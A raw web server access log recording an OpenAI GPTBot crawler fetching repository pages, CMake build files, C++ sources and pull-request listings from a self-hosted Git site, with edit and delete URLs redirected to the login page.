git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:17:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:17:19:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 11092] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm" +[17/Feb/2026:17:19:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12462] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:17:19:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10676] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:19:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:19:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9828] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:19:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 907] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:19:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:17:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35736] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9999] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:17:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:17:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13533] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:17:19:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10923] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm" +[17/Feb/2026:17:19:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10308] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp" +[17/Feb/2026:17:19:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10637] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm" +[17/Feb/2026:17:19:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:19:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:19:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:19:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46760] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:17:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:17:19:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:17:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10094] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build" +[17/Feb/2026:17:19:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build" +[17/Feb/2026:17:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build" +[17/Feb/2026:17:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9861] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old" +[17/Feb/2026:17:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11196] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11422] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11421] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11422] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:19:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:19:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10969] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:19:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:19:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:19:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=all&type=all" +[17/Feb/2026:17:19:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" +[17/Feb/2026:17:19:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23940] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp2.md" +[17/Feb/2026:17:19:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23940] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp2.md" +[17/Feb/2026:17:19:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:17:19:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:19:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:19:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176814] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md" +[17/Feb/2026:17:19:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23943] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 